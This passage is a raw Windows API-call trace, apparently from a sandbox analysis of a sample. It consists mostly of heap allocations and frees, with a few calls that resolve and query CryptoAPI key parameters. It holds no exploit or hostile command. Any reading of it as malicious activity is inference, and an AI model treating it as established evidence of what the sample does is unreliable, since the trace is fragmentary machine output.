[0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.726] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0185.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0185.727] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0185.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0185.728] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0185.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0185.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0185.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0185.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0185.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0185.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0185.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0185.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0185.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0185.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0185.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.732] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0185.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0185.733] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2638, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2638*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: 